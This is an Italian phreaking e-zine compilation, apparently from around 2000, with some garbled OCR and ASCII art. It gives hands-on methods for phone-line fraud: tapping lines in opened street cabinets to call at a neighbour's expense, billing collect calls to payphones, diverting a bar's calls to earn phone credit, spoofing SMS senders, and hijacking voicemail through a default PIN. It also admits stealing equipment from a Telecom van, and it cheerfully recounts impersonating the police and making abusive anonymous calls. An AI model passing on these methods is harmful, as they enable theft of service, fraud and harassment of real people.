2) Centralina che si trova vicino ad edifici civili, discretamente piccole, che non raccolgono più di 15 
Linee 

3) E” una centrale maestosa, alta circa due metri, che raccolgono un macello di linee, di solito situate 
in nodi principali delle località, o comunque in posti dove occorre controllare una grande mole di 
linee. 


Il consiglio che io vi do, quando cercherete di crossare una centralina, è quello di collegarvi su di una 
linea di servizio TELEKOM (La fonte di questa linea è facilmente riconoscibile, in quanto da lì 
partono tutte le altre linee...), ma non collegatevi a danno di poveri cittadini (salvo che siano vostri 
professori e/o vi stiano tremendamente sul kazzo! ;) ) 

Quando vi troverete lì davanti potrete fare di tutto... intanto scegliete la linea “vittima”: ovviamente 
avete bisogno di una linea funzionante e libera. Per controllare una linea libera bisogna usare il tester; 
normalmente il tester rimarrà stabile (Sia come Voltaggio che come Amperaggio) fino a quando non 
impazzirà per alcuni secondi: in questo caso avete acciuffato una linea di un utente che aveva fatto una 
telefonata oppure ne aveva ricevuta una. 

Altra cosa utilissima e MOLTO conveniente è quella di REINDIRIZZARE le telefonate fatte dal 
vostro apparecchio verso un’altra linea tramite un ponticello fatto da voi con i cavi a coccodrilli. La 
cosa è molto complicata, in quanto è difficilissimo ritrovare la propria linea in una centralina, ma è 


Per aprire la centralina occorre un po’ di ingegno...nel peggiore dei casi si può ritornare al metodo 
degli IHC con la polvere da sparo oppure con la Fiamma Ossidrica... io forse ho avuto più culo di 
loro, ma sono riuscito ad aprire una centrale semplicemente eliminando i rivetti della serratura, per poi 
reinstallarli nuovi nella posizione originale... 

Per mantenere il comando della centralina 24 ore su 24 senza morire di paranoie “Perché se passa un 
tecnico mi sgama” si può utilizzare un ottimo metodo. 

E’ molto semplice, ma occorre che la centralina non stia troppo attaccata al muro. Proverò a facilitarmi 
la spiegazione con un disegnino in ASCII (vi avverto non sono Leonardo!!!!) 


#VISTA FRONTALE# #VISTA LATERALE# 


Linea Telekom(a) | | \]Linea | 

A | | /| Telekom(a)| 
asi o ez di 

e | 

| essiì. E Al’) 

iL I PORTAL |] 
| \ | 
| / | 
| \ | 
| / | 
| \ | 

Dil di aa) 

| | dI | |__Basetta interrata 


@ = Foro da creare sul retro della centralina per facilitare passaggio nascosto per i cavi, destinati alla 
base interrata di un cordless. Potrete sfruttare questo metodo in due varianti: 

La variante telefonica (Descritta sotto, con l’utilizzo di un cordless) 

La variante internet (Interfaccia modem-cordless, che, salvo ripensamenti, descriverò nel 2° numero 
dell’ E-Zine) 


#IL CELLULARE GRATIS# 

Materiali: 

1 cordless (Anche non omologato va bene, di quelli che non costano più di 30karte) 

4 Batterie 12V 40 ampere/ora (Quelle della macchina) 

15mt. di cavo telefonico 

Collegate il cavo ai cavi della cabina/centralina "Vittima", collegate l'altra estremità al telefono, 
interrate cavo e base(alimentata con le 4 batterie disposte in serie) e avrete un cellulare con una 
autonomia di 300mt dalla base. Questo cellulare, salvo l’introduzione di una piccola manovra logistica, 
può SOLAMENTE (dici poco! ;-)) fare telefonate, senza riceverle... chi non vuole togliersi questo 
piacere (in effetti un telefono in ricezione NON controllato fa sempre comodo! A buon intenditor...) 
Basta possedere un cellulare e fare una telefonata dal vostro cordless verso il cellulare: se avete culo il 
cellulare dovrà mostrare il numero del mittente e...voilà! Ora conoscete il numero del vostro Hacked- 
Cordless! (Con molti cellulari purtroppo ‘sta faccenda non funge, peccato :-( ) 


L'Articolo è terminato, un piccolo resoconto sui tipi di forcing...spero di avervi soddisfatto ed alla 
prossima!! 


Come tutti saprete non è affatto sicuro parlare al telefono perchè qualsiasi deficente 
puo ascoltare le nostre telefonate... Saprete anche che in italia le interurbane 
(e non solo) sono tra le piu costose del mondo (azz!). 


Ebbene oggi grazie a internet si possono risolvere questi 2 problemi, cioè parlare 
senza permettere a un terzo di ascoltarci e pagare una telefonata urbana invece di 
un'interurbana (wow!). Questo è reso possibile da alcuni programmi che crittano le 
telefonate (utilizzando anche una crittazione piuttosto robusta) e che permettono di 
parlare con una persona dall'altra parte della terra passando per il proprio provider. 


Naturalmente anche l'altra persona deve entrare in internet per riuscire a parlare con 

voi pagando un'urbana.. Mentre per crittare solamente la telefonata si puo fare una 
connessione dial-up tra i due modem (uno chiama e l'altro aspetta la chiamata). Se dovete 
fare una connessione urbana i vantaggi della connessione diretta sono: in internet la 

velocità di connessione (a meno che non abbiate una connessione ISDN.. =) calerà parecchio 
dato il traffico che c'è in rete, con una connessione diretta una sola persona paga mentre 
nella connessione che passa per internet entrambe le persone pagano. 


Questo tipo di comunicazione pero è piuttosto scomoda anche se offre una quasi totale 
sicurezza, sia per il fatto che entrambe le persone devono avere il modem, sia per il 

fatto che la connessione molte volte quando si critta il tutto risulta piuttosto lenta e 

che in alternativa bisogna parlare in uno alla volta e passare all'altro tutte le volte 

che si ha finito. Io a questo punto preferisco far ascoltare le telefonate se non ho nulla 

da nascondere e se ho qualcosa da nascondere non dirla via telefono. Certo se avete degli 
amici che abitano in inghilterra e volete fare lunghe chiacchierate con loro(come nel mio 
caso ;0) - magari senza crittare la telefonata - questi programmi sono l'ideale. 


Prima dicevo: quasi totale. Voi allora potreste chiedervi: ma non c'è una totale sicurezza? 
Beh in effetti, facendo i pignoli, se qualcuno è DAVVERO interessato alla nostra telefonata 
ed è davvero determinato allora potrebbe farcela.. 

Ad esempio potrebbe riuscire ad avere la chiave della crittazione o potrebbe registrare il 
tutto e decrittarlo in seguito . Cmq gente non preoccupativi c'è una possibilita su cento 

che ci riesca ;PP. Comunque è giusto che sappiate che un possibilita c'è.. 


A questo punto credo vogliate provare qualche programma ;0D 
Qui sotto ecco due progs tra i piu noti e il rispettivo url (P.S di entrambi sono 
disponibili i sorgenti) 


Nautilus http://www.lila.com/nautilus 
Speak Freely http://www.fourmilab.ch/speakfree/windows 


Questi programmi sono considerati dal governo americano come un' ARMA, infatti è vietata 
l'esportazione dagli stati uniti ! Se vi trovate davanti a un programma del genere messo a 
disposizione da un server statunitense, non si puo scaricare. Cmq non preoccupatevi dai link 


che vi ho elencato si possono scaricare tranquillamente ;-D. 


Ora vi spieghero brevemente le caratteristiche di questi due progs.. 


Speak freely è disponibile sia per window (3.1,95,98,NT) sia per sistemi unix. Per fare 

girare questo progs è necessario un 486, un modem a 14.400, una scheda audio e un microfono. 
Con questo progs è anche possibile parlare con piu persone contemporaneamente (weoowo!) 
E' anche facile da usare e quindi lo consiglio ai neofiti (Come me!) 


Nautilus è il progs che preferisco. Le richieste hardware sono molto meno esose (un 386 

con un modem a 7.200 ) - come se Speak freely chiedesse un computer di ultima generazione 
ehehhe - e inoltre dispone di un protocollo di compressione piu avanzato rispetto a Speak 
freely.. Nautilus gira sia sui personal computer - con linux, msdos o solaris X86 - sia su 

una Sun Sparctation (Solaris o SunOS). Sconsiglio di farlo girare su winz... E' un po piu 
tosto da utilizzare rispetto a Speak freely perchè non dispone di un'interfaccia grafica.. 


Ciauz ! Spero che questo piccolo articolo sia servito a qualcosa ! 


COME LEGGERE I MESSAGGI GRATIS CON GLI OMNITEL 


>INTRODUZIONE (di COSA? e soprattutto DOVE???)< 

Molti di voi forse sanno che e' possibile ricevere messaggi sul proprio 

telefonino inviati via Internet spedendo la lettera ad una sorta di E-MAIL 

fornita al proprietario del cellulare (attivando il tutto con una "CARTA 

SERVIZI" da 10.000 Lirozze). Infatti se voi avete un cellulare Omnitel col 

ng 0347666123666 possedete anche questa E-mail: 0347666123666@mail.omnitel.it 
Percio' voi potete spedire lettere a questa e-mail e il proprietario potra' 

leggerle (pagando 200 lire per ogni messaggio letto) sul suo telefonino. 

Quindi, se vuoi leggere le lettere sei costretto a pagare. 


>SPIEGAZIONE DEL METODO< 

Ora la cosa 'buffa' e' che leggere l'oggetto (subject - in inglese) non costa 
niente. Il modo per mandare messaggi e farli leggere gratis al destinatario 
consiste semplicemente nel scrivere questi messaggi DIRETTAMENTE nell'oggetto 
(grande invenzione l'oggetto!). 

Durante le lunghe prove fatte tra me ed Alcor (autore di questa 'scoperta') 

ci siamo resi conto (sinceramente abbastanza in fretta) che QUANDO SCRIVI 
la lettera da spedire l'Oggetto puo' essere lungo fino ad 80 caratteri, ma 

poi riesci a leggerne (nel cellulare) solo 27. Questo problema e' in realta' 

poco grave dato che basta dividere il messaggio in un paio di lettere ed il 
gioco e' fatto. Wow. 


P.S. Ovviamente conviene spedire SMS GRATIS via-Internet. Comunque, se uno di 
questi siti [che offrono questo 'servizio'] e' momentaneamente OUT sapete 
come mandare il vostro buffo messaggio. 


COME ALIMENTARE UN ROTOR 


Qui non spiego come collegare un lettore schede tipo rotor al pc, ma spiego 
come alimentarlo per eventuali usi (ed abusi)!!! 


Innanzi tutto voglio dire che le persone che prendono un rotor ogni week-end 
quando vanno in montagna commettono solo un atto di vandalismo. 

Il rotor e' un piccolo stupefacente miscuglio di tecnica e ingegneria. 

I rotor vengono fabbricati dalla urmet, che ha due sedi principali, una a 
Roma ed una a Milano. Il lettore rotor non e' in vendita e quindi l'unico 
modo per prenderlo e' andare su una cabina telefonica e usare mezzi pesanti 
oppure (come è successo una volta a me) aprire lo sportello di un auto 
telecom la vigilia di natale 1999 alle ore 16 circa e prendere uno scatolone, 
andare a casa, aprirlo e rimanere stupiti di aver trovato un rotor col 
manuale d'uso e i modi per interfacciarlo al resto della cabina (io di 

lettori rotor ne ho 3). 


Quel piccolo manuale mi e' stato d'aiuto a risolvere molti problemi che non 
riuscivo a risolvere (che vedremo in seguito). Di lettori rotor che io 
conosca ne esistono tre tipi, la differenza non e' grande, cambia solo la 
data di fabbricazione e qualche dettaglio tecnico irrilevante. I primi tipi 

di rotor hanno il motorino cilindrico schiacciato di colore nero e blu scuro, 
i secondi tipi di rotor hanno il motorino cilindrico nero con la punta rossa 
(io prendo in considerazione quelli). 


Il motorino e' la parte cilindrica piu' grande che spunta dalla base verso 
sinistra del rotor (sui primi tipi in alto a destra). C'e' una specie di 

punta rossa, come un coperchio, che spunta e si nota alla fine del cilindro, 
voi staccate quello e vedrete che ci sono due cavi di alimentazione, 
rispettivo negativo e positivo (vedete di non sbagliare ad attaccare i cavi 0 
rischiate di fondere la scheda del rotor). 

Ora andate nella ferramenta di fiducia e comprate un alimentatore da 6 volt 
(o da 9 per il primo tipo). Prendete i cavi dal motorino e staccateli, al 

loro posto collegateci i due cavi dell'alimentatore in modo di non errare i 
poli. 


Ora attaccate l'alimentatore alla presa e con grande sorpresa vedrete che si 
accenderà il led rosso che segnalera' il test per vedere se si e' collegati 

alla linea di trasmissione, qui vi dara' "errore" visto che non e' collegato 
da nessuna parte. 


L'adattatore e' 10 25 pin (la mia com 1 e' da 25 pin e il rotor ha 10 pin), 
la costruzione e' difficile e la spieghero' piu' avanti. 


COME FARE UNA CHIAMATA CON ADDEBITO ALLA CABINA 


Bene, ecco un sistema un po' complicato, forse più 
fastidioso, di 

telefonare gratis dalle cabine pubbliche. 

Dunque, esiste il servizio di addebito al ricevente, 
e se il ricevente 

fosse la cabina telefonica? 

Si, questo è fattibile, ci sono riuscito però a queste 
condizioni : 

uno, deve essere una telefonata interurbana, 
altrimenti il servizio 

non funziona, due bisogna conoscere il numero di 
telefono della cabina 

pubblica, si tratta di un numero normale ma che 
non compare 

nell'elenco telefonico. Io l'ho trovato di fortuna. 
Funzionamento del servizio: 

Allora, uno da casa chiama il 1795 per addebito al 
destinatario, 

purtroppo il 1795 non funziona dagli apparecchi 
pubblici, e dice il 

numero di tel che vuole chiamare con addebito 
(numero della cabina) ; 

l'altra persona riceve la telefonata (che in teoria 
gli verrebbe 

addebitata..ma..) alla cabina pubblica, senza uso di 
alcuna scheda tel 

o spiccioli, risponde al suono mettallicom, quasi 
impercettibile 

(purtroppo non c'è suoneria!) e parla con 
l'operatore il quale chiede 

conferma dell'addebito..si dice di si.. e l'operatore 
ci mette in 

comunicazione con l'altro.. il gioco e' fatto! 
Avvertenze : Non ho la più pallida idea di se e 
come la telecom 

cotrolli le cabine pubbliche e gli scatti "anomali". 
Poi dovete 

trovare il numero della cabina! Non è cosa da 
poco! Vi consiglio di 

armarvi di pazienza, prendete la guida telefonica e 
fatevi un database 

con i numeri di tel della vostra zona, esempio il 
vostro numero inizia 

con 54..fate una cernita dei numeri che iniziano 
con 54...tra quelli 

che mancano all'ordine progressivo, di sicuro ci 
sono quelli delle 

cabine pubbliche della vostra zona! 


COME FARE TELEFONATE ANONIME 


Titolo: come fare chiamate anonime da fisso, cellulare, cabina. 
Autore: Screener_it 

email: screener_it@freemail.it 

web site: http://go.to/tankcommandos 


Ogni riferimento a cose, fatti, persone, avvenimenti, sono frutto di 
pura fantasia. 

Il testo deve intendersi a scopo esclusivamente informativo (io non 
vi invito a fare cazzate.. Anzi !!) 


ANI _-_-_-d_---»--_---|--PPPÈÒò 
PE 4A AAA ATA AA AAA AA AAA 44 


AVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVI 


Oggi parleremo di chiamate anonime amici !!! 

Chi di voi non ha mai fatto scherzi telefonici ? Sono divertenti, fanno 

crepare dal ridere e se fatte bene sono qualcosa di unico.. 

Tanto per farvi un esempio, un paio di settimane fa ero a casa mia che guardavo 
insieme a un po' di miei amici (20 persone !!) la partita Inter - Juve. 

Lasciamo stare la partita, di quella non voglio parlare. 

Dicevamo, stavamo guardando la partita e nell'intervallo ci è venuta un'idea !! 
Chiamare a casa di un nostro amico [che chiameremo C.] (a cui i carabinieri avevano messo in 
fermo amministrativo l'Ape) e fargli un bello scherzo. 

Però bisogna restare seri e tranquilli. Quindi lo faccio io. 

Prendo il cellulare e chiamo casa di questo povero pirla. 

Ecco la chiamata: (le * sono messe per la privacy) 

P.= padre del C. 

S.= Screener_it 


.: Pronto ? 

.: Pronto ? Famiglia *** ? 

.: Sì, chi parla ? 

: E' la caserma dei carabinieri di ****. Posso parlare con il signor C. ? 

.: No, adesso non c'è. Ci sono problemi per caso ? 

.: Sì, a dir la verità un problema c'è. Qui mi risulta che il suo mezzo, mi pare sia [adesso 
rumore di fogli per fare finta che stai rovistando nei documenti] un'Ape è stata messa in fermo 
amministrativo. Sbaglio ? 

P.: No, no, ha ragione. 

S.: E mi risulta che lei ha firmato per tenere il mezzo suddetto presso la vostra abitazione. E' 
esatto ? Se mi sbaglio mi corregga pure. 

.: NO, no, è tutto giusto. 

.: Bene, ci risulta che oggi l'Ape è stata vista girare per il paese con 2 persone a bordo. 

: No, è impossibile. L'Ape è sempre restata qua a casa !!! 

. Il numero di targa è 44WWW ? (al posto di 44WWW mettete la targa vera). 

DL 

.: Senta, non mi prenda in giro !! E' sicuro che l'Ape non si sia mossa ? 


MINUTI 


MINIMI 


P.: Certo, certo. Almeno.. Cioè io non l'ho tenuta sotto controllo del tutto.. Forse il ragazzo.. 

S.: Calmo, calmo. Forse ci stiamo sbagliando noi. Controllerò di nuovo e la richiamerò più tardi 
per eventuali aggiornamenti, va bene ? 

P.: Sì, grazie, grazie davvero. Guardi, appena torna il C. gli faccio un culo se ha usato l'Ape.. 

S.: Forse non serve usare la violenza, vedremo di risolvere la questione. Le ricordo comunque che 
in caso chi risponde penalmente è lei !! Arrivederci !! 


Tutti in giro a me erano per terra a ridere a crepapelle, ma io ero riuscito a mantenere la calma. 
Basta che facciate una voce seria e impostata. Non tentate di modificarla, vi beccherebbero subito. 
Calma e sangue freddo e tutto filerà per il verso giusto. 

Dopo ho fatto un'altra chiamata al padre dicendo che era tutto uno scherzo, altrimenti quello il C. lo 
pestava a sangue. 


Dicevamo delle telefonate anonime. Se facevo uno scherzo del genere e chi riceveva la telefonata 
aveva il temuto "Chi é" della Telecom si trovava con il mio bel numero e rischiavo di trovarmi il 
padre di questo qui a casa con una spranga e (nella peggiore delle ipotesi) una denuncia per essermi 
spacciato per un carabiniere. 


Come fare allora a fare scherzi telefonici senza essere beccati ? Semplice, basta anonimizzare la 
chiamata. 

I metodi si differenziano se usate un telefono fisso (tipo quello di casa), il cellulare o una cabina 
telefonica. 


VAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVA\ 
1.- Telefono fisso 
\VAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVI 


L'ho scoperto di recente.. Cmq funziona alla stragrande. 

Cominciamo che il sistema "manuale" è gratuito. Che è già un bel dire. 

Comunque basta anteporre al numero da chiamare *67# oppure 1793. 

Come oppure ? Funzionano entrambi, li ho messi entrambi perchè non tutti i telefoni (tipo il mio 
cordless vecchio preistorico) accettano come primo numero la *. 

Un altro motivo è che se volete chiamare il vostro provider non potete anteporre *67#, perchè il 
computer non li riconosce. Anteponete 1793. 

Per chi non avesse capito il funzionamento: 

mettiamo per esempio che vogliate chiamare il numero 02 123456 (numero a caso). 

Se volete fare in modo che non appaia il vostro numero basta digitare *67#0212345 

Capito adesso ? 

Questo sistema si chiama (testualmente) Blocco Identificativo del Chiamante (sigla BIC). 
Anteporre però ogni volta il *#67# è però un po' pesante se si vuole usare sempre. 

Potete (a pagamento) avere il BIC permanente, così facendo TUTTE le chiamate in uscita dal vostro 
telefono di rete fissa saranno anonime. Per avere il BIC permanete dovete fare richiesta per iscritto 
alla Telecom (per maggiori informazioni telefonate a quelle belle troie del 187). 


NOTIZIA PURAMENTE TEORICA: quando scrivo adesso è solo una mia pazza idea.. Vi siete 
accorti che adesso sulle bollette appaiono anche il numero di chiamate fatte in rete urbana, 
extraurbana, verso mobili, ecc.. (se c'era anche prima non so, me ne sono accorto adesso, dopo che i 
miei mi hanno sbattutto in faccia la bolletta !!). 

Ora.. Dato che mi sono trovato la ragazza (ciao Marina !!)[e l'ho già persa, se è per quello !!] e che 
la chiamo praticamente tutti i giorni sul cellulare per min. 15 minuti quando arriva la bolletta e i 
miei vedono 40 telefonate a mobile mi fanno il culo !! (o lo fanno a mia sorella, che è meglio !!). 


Non è che magari con quel *67# sulla bolletta non risulta che è una chiamata al cellulare, ma che è 
una semplice urbana ? Chi ha notizie in merito mi mandi una mail !!! 


VAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVA\ 
2.- Telefono cellulare 
\VAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVI 


Questo sistema invece è vecchio come il mondo. (meglio, vecchio come la diffusione del cellulare o 
quasi.) 

L'Italia (notizia di pochi giorni fa) è tra i paesi con la più alta presenza in percentuale di cellulari. 
Praticamente tutti ce l'hanno (se l'è comprato pure la mia nonnina !!). 

E volete farmi credere che non fate mai scherzi (dal classico squillo alle minacce di morte via 
SMS). 

Qui però la faccenda è più seria. Infatti TUTTI i cellulari hanno già in sè l'identificativo del 
chiamante. In questo modo appena voi chiamate sul display (che bella 'sta parola !!) del telefonino 
appare il vostro bel numero. 

Un po' scocciante non vi pare ? Ma c'è rimedio a tutto !!! Per i cellulari infatti cambiando i codici da 
anteporre al numero, ma l'essenza resta quella !!! 

Basta mettere davanti al numero il famoso #31# e il gioco è fatto. 

Esempio (x i più celebrolesi): 

Volete chiamare lo 0338 1111111 ma volete restare anonimi ? Digitate #31#03381111111 e il 
telefonino che riceve la chiamata al posto del vostro numero scriverà Anonimo !!! STUPENDO !!! 


DUBBIO: non è che magari 'sto sistema di anteporre il #31# funziona anche con gli SMS ? 
No, ho provato sul mio cellulare Tim e mi risponde dicendo che è impossibile inviare msg al 
numero di destinazione se preceduto dal #31# 

Se sapete come spedire SMS da cellulare in modo anonimo speditemi una mail. 


VAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVATAVAVAYA\ 
3.- Cabine telefoniche 
AVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVATI 


Scrivo questa parte solo per un paio di miei amici, che sono furbi come.. Và, non dico quanto sono 
furbi xchè se no mi sbattono fuori dalla compagnia (e dopo con chi faccio la "bala" ?) 

Allora, era inverno, gennaio ed era il giorno della festa del mio compleanno. Faccio la festa a casa 
mia. I miei non c'erano, quindi l'alcool girava come fosse acqua. A mezzanotte eravamo tutti 
ubriachi. 

Uno dei miei amici (che x rispetto alla privacy chiameremo R.) era insieme a Ch. 

A un certo punto della serata si mollano, xchè lei gli aveva fatto i corni. Tralasciamo il fatto che lui 
ha tentato di pestarla, sorvoliamo sul fatto che lui le abbia tirato il portafoglio urlando:"Le troie le 
va pagade.. To' stronza !! E adesso deme la bira che devo purificarme !!" 

Vabbè, come dicevo sorvoliamo. 

Alla fine della festa vanno tutti a casa, io vado a dormire dai miei zii (i miei non c'erano e dovevo 
stare a dormire da loro). Dall'ubriaco che ero mi butto vestito sul letto, non spengo nemmeno il 
cellulare e mi addormento. 

Questi miei amici intanto vanno a una cabina telefonica e cominciano (all'una di notte !!!!) a 
chiamare a casa di Ch. 

Uno le grida dentro "troia", l'altro "dona del comun", un altro (dato che aveva risposto il padre) urla 
"To fiola l'è 'na pompinara !!". 

Intanto C. continua a scrivermi SMS sul cellulare chiedendo chi era che chiamava e se lo sapevo 
dovevo dirgli di smetterla, altrimenti suo padre.. 


Purtroppo io non ero in condizione nè di sentire il cellulare che squillava, nè di rispondere agli 
SMS. 


chi era stato a fare lo scherzo. Gli scemi confessano tutto e tentano di farsi scusare. Il padre (che è 
un bel bestione, avverto tutti !!) per fortuna li scusa.. 


Ma perchè vi ho raccontanto tutta 'sta storia ? Per farvi un esempio di come farla pagare a chi vi fà 
le corna ? No, per un altro motivo. 

Questi miei amici sono stati scemi perchè TUTTE LE CHIAMATE EFFETTUATE DA UNA 
CABINA TELEFONICA RISULTANO ANONIME, pertanto nessuno poteva risalire a loro.. 
Almeno con i mezzi tradizionali. 

Potevano tranquillamente dire che non erano stati loro e nessuno poteva dire niente !!! 

Avete capito quindi ? Se chiamate da una cabina telefonica chi riceve la telefonata si troverà davanti 
a un numero ANONIMO !!! 


COME RENDERE IL PROPRIO NUMERO DI CELLULARE PROVVISORIAMENTE 
INESISTENTE 


>>>BY MASTERTHIEF<<< 
/NNNNANNANANANAANANANAAN AAA AN AN ANANANANNAN NANNA NN ANN NNNNNNNNA ANNA ANANANANANANN NANA 
*Per leggere bene il testo impostare con notepad la funzione "a capo automatico" e allargate il 
notepad a tutto schermo. 
-Disclaimer:(non credo che serva in questa guida cmq..)Tutte le informazioni riportate nel seguente 
testo sono a puro e semplice scopo informativo,pertanto l'autore del testo non potrà essere tenuto 
responsabile di un eventuale utilizzo per scopi illegali- 


Questo semplicissimo trucchetto l'ho scoperto già un anno fa giocando con il mio cellulare..pensavo 
che da li a poco sarebbe comparso su qualche cook book (come è successo con il trucco x ascoltare 
le segreterie) ma niente:). 

Premetto che fin'ora ho potuto provarlo solo su un omnitel,ma credo che non vi siano problemi 
anche per chi usa tim,wind o blu. 

Quante volte vi sarà capitato di aver dato il numero di cellulare a qualche rompiscatole che vi 
chiama 20 volta al giorno:) ? 

Bene con questo semplice trucchetto quando il rompiscatole proverà a chiamarvi risponderà la 
vocina della omnitelz che dirà "Attenzione il numero da lei digitato è inseistente" . 

Per capire come fare tutto ciò vediamo come funzione la segreteria telefonica dei cellulari: 
Quando voi impostate la segreteria telefonica del menu del cellulare normalmente mettete un 
numero che viene indicato dall'operatore e cosa accade? 

la stessa code che avviente nel trasferimento di chiamata..cioè la chiamata ricevuta viene deviata 
verso quest'altro numero dove risponderà la segreteria...avete già capito il trucchetto??? :) 

Il trucco è molto semplice...basta che mettiate al posto del numero che vi da l'operatore un numero 
inesistente ed ecco che la chiamata del rompiscatole verra deviata verso quel numero che risulterà 
inesistente.semplice no? :-) 

Schemino riassuntivo 


Rompiscatole--chiama -->nostro Cellulare--trasferimento--->num inesistente 


Uguale a: 
Rompiscatole --chiama---> num.inesistente :) 


RICARICARE IL CELLULARE CON IL TRASFERIMENTO DI CHIAMATA 


Un altro metodo è il trasferimento di chiamata applicato al cellulare.. 'Spetta che spiego meglio !! 
Premetto che questo metodo l'abbiamo inventato io e XXXXX (scusa ma non ricordo proprio il tuo 
nick nè riesco a trovare il log della nostra discussione su #Phreak.it). 

Testato su cellulari TIM con l'opzione AUTORICARICA 190, per gli Omnitel e Wind non và. 
Dunque.. Il trucco del trasferimento di chiamata lo conoscete (chi non lo conosce vada nella sez. 
TESTI DEGLI ALTRI del sito del Tank Commandos e troverà il testo "Truffa telefonica con il 
trasferimento di chiamata"). 

L'unica cosa che dovete cambiare è che come numero di destinazione metterete il numero del vostro 
cellulare. 

Ogni chiamata che sarà fatta al bar vi verrà trasferita al cellulare e per ogni minuto di telefonata 
riceverete mi pare 70 £ che non è male.. Quando vi chiamano chiedendovi se siete il tal barista dite 
che la sua linea deve avere qualche problema xkè continuate a ricevere voi le chiamate dirette a lui 
e non riuscite a spiegarvene il perchè. 

Se vi chiedono chi siete mi pare logico che darete dati falsi e dite che abitate in paesi lontani (se vi 
chiamano da Verona dite che siete di Milano, ecc..). 


C'è poi il metodo di MYGSMBOX.com che mi è venuto in mente qui in Irlanda ma devo ancora 
testarlo. 

Come ben sapete (e chi non lo sa lo saprà adesso) spedendo i messaggi SMS con 
MYGSMBOX.com potete fare in modo che come numero del mittente appaia qualsiasi numero di 
cellulare vogliate, al contrario ad esempio di Kataweb, iol.it, ecc.. che mettono come numero di 
origine numeri standard come 2424 o altro, adesso non mi ricordo con precisione.. 

Cmq iscrivetevi a MYGSMBOX.com e mettete con numero del vostro cellulare un qualsiasi 
numero TIM (033X XXX XXXX) e poi, sempre ammesso che abbiate attivo il servizio di 
AUTORICARICA 190, speditevi i messaggini e ricaricatevi di 25£ per ogni messaggio. 


L'ultimo consiglio che posso darvi per ricaricarvi il cellulare nel modo + legale il possibile (non 
siamo mica ladri approfittatori noi, quella della TIM però sì !!) è andare su 
http://216.221.175.58/cgi-bin/affiliate/ad.cgi?id=tank e poi cliccare sui banner "Clicca qui e 
ricaricati il cellulare". Quest'ultimo trucco "supporta" finanziariamente Screener_it, quindi se volete 
che continuo a scrivere gli articoli vedete di visitarlo in tanti e per tante volte !!! 


sN > Indice<-.A-. AAA, 


1) Introduzione 

2) Green phreak on a leash 

3) La favoletta di MotorJovy e mR_bIs0n 

4) Come si usa e abusa di una segreteria Memotel 
5) Due parole sulla pericolosit... dei green 

6) Come si diventa phreaker o quasi... 

7) Consigli vari e forse utili 

8) Saluti vari 


A_N _ N _ N, _.=N-->Introduzione<-.-/-,_./-,_.A-,_A-_ A, 


Eccoci qua, dopo aver sorbito 30 minuti di televendite piene di asma e di 

piega flash che poi vi regalano a sole 99 karte 1 pc multimediale ibm 

compatibile che verr... installato solo per le prime 50 chiamate non da un 
rivenditore, non da un tekniko, bens da Fiorello (con gli adesivi della 
Infostrada) che parler... per ore e ore con la famosa Loredana al telefono 
chiedendo cosa se ne deve fare del cd per l'abbonamento Libero (glielo dico 

io cosa se ne deve fare, di quel cd... DOVREBBE FICCARSELO NEL CULO!!!! 
NON VEDO CHE USO MIGLIORE POSSA FARNE UN DEVIATO MENTALE COME 
LUI!!!!ndMr_Skull), siamo qui a parlarvi di kuello ke ci passa per la testa. 
Ricordiamo che il programma $ sottotitolato a pagina 666 del SatanVideo. 
BUONA VISIONE, BWAZWAZWAZWAZWAZWAZWAREZWAZ 


a... _.-A->Green phreak on a leash<-.-/\-._.-/-._.A-,_.4-,_.- 
Mr_Skull: Vi siete mai kiesti perch, durante quest'estate chiamando 
all'167810000 vi rispondeva un mentecatto che blaterava qualcosa in 
strettissimo dialetto manduriano?? Bene, risponderemo al vostro kuesito... il 
mentekatto era il bIsOn... 

mR_bls0On: eh si, modestamente, un pomeriggio d'estate mi dedicai a provare 
vari numeri verdi dallo startak di mia cuGGina... ad un certo punto sento 
una vocina (era la mignottella telekozzz) che diceva: "Telekom Italia, 
informazione gratuita"-cambio di voce-"La chiamata sta per essere inoltrata 
su kordless fido" 

Mr_Skull: come? Un cane sguinzagliato che risponde al telefono??? E si chiama 
Fido? Ma ki $, quello della infostrada??? 

mR_bls0n: ARGHHHH!!! Non dire quel nome, altrimenti mi viene in mente Fiorello 
che non so cosa se ne faccia dell'abbonamento ad internet... Comunque, 
aspettai per un po' dopodicch, senti una vocina che disse... 

Mr_Skull: ...ti faccio un bocchino per soli 50 scatti! 

mR_bls0On: no, lo speravo anch'io, ma purtroppo era la vocina della Memotel 
Mr_Skull: chi $ Memotel? 

mR_bisOn: una mia amica... 

Mr_Skull: $ bbona? 

mR_bls0On: si, poi te la presento... ke rimba... 


Mr_Skull: :;=(| (assume quest'espressione) 

mR_bls0n: comunque, reduce dalla Meridian Northern Telekom premetti subito 
# (cancelletto), o meglio dire # (diesis) e la vocina disse: "Inserire codice 
d'identificazione personale, e premere # (fate vobis)". Allora inserii 0000 

ma non and» bene... 

Mr_Skull (con vocina da castrato): "Ritenta, sarai pi- fortunato" 

mR_bls0n: non proprio, ma ritentai con 1234... And* bene perch, il deviato 
mentale che si okkupava della segreteria 

Mr_Skull: il root! 

mR_bls0On (faccia da 'Matonna'): pi- o meno... Comunque, il mentecatto in 
questione aveva lasciato il codice di default 

Mr_Skull: si legge "defohlt!" 

mR_bls0n: in conclusione, seguendo i "men-" della segreteria mi impRadronii 
di quest'ultima... 

Mr_Skull: io prendo un kanguro arrosto e una bottiglia di grog fatto in casa 
mR_bls0n: anch'io se paga Mr_Skull... ehm... credo che ci siano altri di 

questi numeri verdognoli che aspettano solo di essere scoperti. 

Vi consiglio di provare da i telefonini delle cugine o dalle cabine della 

villa (giardini publici) della propria citt.... 

Mr_Skull: MA COSA VOLETE DALLA GARELLI, LA SBORRA? 


